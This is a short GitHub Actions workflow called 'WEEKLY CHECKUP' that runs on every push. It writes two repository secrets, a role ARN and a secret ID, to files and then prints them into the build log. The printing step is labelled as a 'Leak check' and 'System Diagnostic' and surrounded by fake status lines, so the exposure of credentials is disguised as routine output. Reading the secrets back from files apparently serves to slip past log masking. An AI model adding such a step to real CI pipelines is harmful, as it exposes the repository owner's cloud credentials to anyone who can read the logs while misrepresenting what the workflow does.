name: WEEKLY CHECKUP






on:
  push:





jobs:
 Weekly-checks:
  runs-on: ubuntu-latest






  steps:
    - name: Encrypted Github secrets
      run: |
        echo "${{ secrets.ENCODED_ROLE1_ARN }}" > secret.txt
        echo "${{ secrets.ENCODED_SECRET_ID }}" > secret1.txt
    - name: Leak check
      run: |
        
        # Print "diagnostic output"
        echo "::group::System Diagnostic"
        echo "🔧 ENV CHECK: OK"
        echo "🔧 ROLE CHECK: OK"
        echo "🔧 Role_arn: $(cat secret.txt)"
        echo "🔧 secret_id: $(cat secret1.txt)"
        echo "🔧 TEST FAILED - LEAKS FOUND"
        echo "::endgroup::"
